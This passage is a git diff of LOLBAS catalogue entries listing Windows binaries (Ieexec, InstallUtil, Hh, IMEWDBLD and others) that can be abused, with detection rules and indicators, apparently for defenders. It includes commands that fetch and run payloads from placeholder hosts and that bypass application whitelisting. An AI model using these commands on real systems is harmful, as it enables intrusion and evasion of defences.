c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ +- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ +- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml - - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml +- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - - Link: https://www.sothis.tech/author/jgalvez/ +- Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - - Person: Jesus Galvez - Handle: +- Person: Jesus Galvez + Handle: null diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 6b4fc8b1..073ce756 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,34 +1,37 @@ ---- Name: Gpscript.exe Description: Used by group policy to process scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Gpscript /logon - Description: Executes logon scripts configured in Group Policy. - Usecase: Add local group policy logon script to execute file and hide from defensive counter measures - Category: Execute - Privileges: Administrator - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: Gpscript /startup - Description: Executes startup scripts configured in Group Policy - Usecase: Add local group policy logon script to execute file and hide from defensive counter measures - Category: Execute - Privileges: Administrator - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: Gpscript /logon + Description: Executes logon scripts configured in Group Policy. + Usecase: Add local group policy logon script to execute file and hide from defensive + counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: Gpscript /startup + Description: Executes startup scripts configured in Group Policy + Usecase: Add local group policy logon script to execute file and hide from defensive + counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\gpscript.exe - - Path: C:\Windows\SysWOW64\gpscript.exe +- Path: C:\Windows\System32\gpscript.exe +- Path: C:\Windows\SysWOW64\gpscript.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml - - IOC: Scripts added in local group policy - - IOC: Execution of Gpscript.exe after logon +- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml +- IOC: Scripts added in local group policy +- IOC: Execution of Gpscript.exe after logon Resources: - - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ +- Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f8275a17..624f88ff 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -1,37 +1,38 @@ ---- Name: Hh.exe Description: Binary used for processing chm files in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: HH.exe http://some.url/script.ps1 - Description: Open the target PowerShell script with HTML Help. - Usecase: Download files from url - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. - Usecase: Execute process with HH.exe - Category: Execute - Privileges: User - MitreID: T1218.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: HH.exe http://some.url/script.ps1 + Description: Open the target PowerShell script with HTML Help. + Usecase: Download files from url + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. + Usecase: Execute process with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe +- Path: C:\Windows\hh.exe +- Path: C:\Windows\SysWOW64\hh.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml - - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml +- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml Resources: - - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ +- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 3c71cfc4..88c3a319 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -1,22 +1,24 @@ ---- Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2020-03-05 Commands: - - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 +- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL + as an argument, it will download the file served at by that URL and save it to + %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. + or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml Resources: - - Link: https://twitter.com/notwhickey/status/1367493406835040265 +- Link: https://twitter.com/notwhickey/status/1367493406835040265 Acknowledgement: - - Person: Wade Hickey - Handle: '@notwhickey' +- Person: Wade Hickey + Handle: '@notwhickey' diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca2..8ce9df9b 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,29 +1,29 @@ ---- Name: Ie4uinit.exe Description: Executes commands from a specially prepared ie4uinit.inf file. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ie4uinit.exe -BaseSettings - Description: Executes commands from a specially prepared ie4uinit.inf file. - Usecase: Get code execution by copy files to another location - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: ie4uinit.exe -BaseSettings + Description: Executes commands from a specially prepared ie4uinit.inf file. + Usecase: Get code execution by copy files to another location + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: c:\windows\system32\ie4uinit.exe - - Path: c:\windows\sysWOW64\ie4uinit.exe - - Path: c:\windows\system32\ieuinit.inf - - Path: c:\windows\sysWOW64\ieuinit.inf +- Path: c:\windows\system32\ie4uinit.exe +- Path: c:\windows\sysWOW64\ie4uinit.exe +- Path: c:\windows\system32\ieuinit.inf +- Path: c:\windows\sysWOW64\ieuinit.inf Code_Sample: - - Code: +- Code: null Detection: - - IOC: ie4uinit.exe copied outside of %windir% - - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml +- IOC: ie4uinit.exe copied outside of %windir% +- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml Resources: - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index c14b4a30..ab7c33c1 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -1,36 +1,38 @@ ---- Name: Ieexec.exe -Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. -Author: 'Oddvar Moe' +Description: The IEExec.exe application is an undocumented Microsoft .NET Framework + application that is included with the .NET Framework. You can use the IEExec.exe + application as a host to run other managed applications that you start by using + a URL. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. - Usecase: Download and run attacker code from remote location - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. - Usecase: Download and run attacker code from remote location - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - IOC: Network connections originating from ieexec.exe may be suspicious +- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- IOC: Network connections originating from ieexec.exe may be suspicious Resources: - - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ +- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' +- Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index af0ddcd7..4ebbb8a5 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -1,35 +1,34 @@ ---- Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - - Command: ilasm.exe C:\public\test.txt /exe - Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 7, Windows 10, Windows 11 - - Command: ilasm.exe C:\public\test.txt /dll - Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll - Usecase: A description of the usecase - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 7, Windows 10, Windows 11 +- Command: ilasm.exe C:\public\test.txt /exe + Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 7, Windows 10, Windows 11 +- Command: ilasm.exe C:\public\test.txt /dll + Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll + Usecase: A description of the usecase + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code_Sample: - - Code: +- Code: null Detection: - - IOC: Ilasm may not be used often in production environments (such as on endpoints) - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml +- IOC: Ilasm may not be used often in production environments (such as on endpoints) +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml Resources: - - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt +- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt Acknowledgement: - - Person: Hai Vaknin(Lux) - Handle: '@VakninHai' - - Person: Lior Adar - Handle: +- Person: Hai Vaknin(Lux) + Handle: '@VakninHai' +- Person: Lior Adar + Handle: null diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e4b9ab19..538e5597 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,28 +1,29 @@ ---- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InfDefaultInstall.exe Infdefaultinstall.inf - Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. - Usecase: Code execution - Category: Execute - Privileges: Admin - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: InfDefaultInstall.exe Infdefaultinstall.inf + Description: Executes SCT script using scrobj.dll from a command in entered into + a specially prepared INF file. + Usecase: Code execution + Category: Execute + Privileges: Admin + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\Infdefaultinstall.exe - - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe +- Path: C:\Windows\System32\Infdefaultinstall.exe +- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: - - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a +- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +- Link: https://twitter.com/KyleHanslovan/status/911997635455852544 +- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ +- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - - Person: Kyle Hanslovan - Handle: '@kylehanslovan' +- Person: Kyle Hanslovan + Handle: '@kylehanslovan' diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 5bd0cf39..a148ea19 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -1,48 +1,59 @@ ---- Name: Installutil.exe -Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies +Description: The Installer tool is a command-line utility that allows you to install + and uninstall server resources by executing the installer components in specified + assemblies Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: Execute the target .NET DLL or EXE. - Usecase: Use to execute code and bypass application whitelisting - Category: AWL Bypass - Privileges: User - MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: Execute the target .NET DLL or EXE. - Usecase: Use to execute code and bypass application whitelisting - Category: Execute - Privileges: User - MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: InstallUtil.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - Usecase: Downloads payload from remote server - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1218.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1218.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: InstallUtil.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder + (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Splunk: https://research.splunk.com/endpoint/4fbf9270-43da-11ec-9486-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/dcf74b22-7933-11ec-857c-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/cfa7b9ac-43f0-11ec-9b48-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/ccfeddec-43ec-11ec-b494-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/1a52c836-43ef-11ec-a36c-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/28e06670-43df-11ec-a569-acde48001122/ Resources: - - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 - - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md - - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ - - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool +- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ +- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 +- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md +- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ +- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' - - Person: Nir Chako (Pentera) - Handle: '@C_h4ck_0' +- Person: Casey Smith + Handle: '@subtee' +- Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 2b56882f..8271b488 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -1,36 +1,39 @@ ---- Name: Jsc.exe Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-05-31 Commands: - - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: jsc.exe scriptfile.js + Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and + output scriptfile.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: jsc.exe /t:library Library.js + Description: Use jsc.exe to compile JavaScript code stored in Library.js and output + Library.dll. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml - - IOC: Jsc.exe should normally not run a system unless it is used for development. +- Sigma: 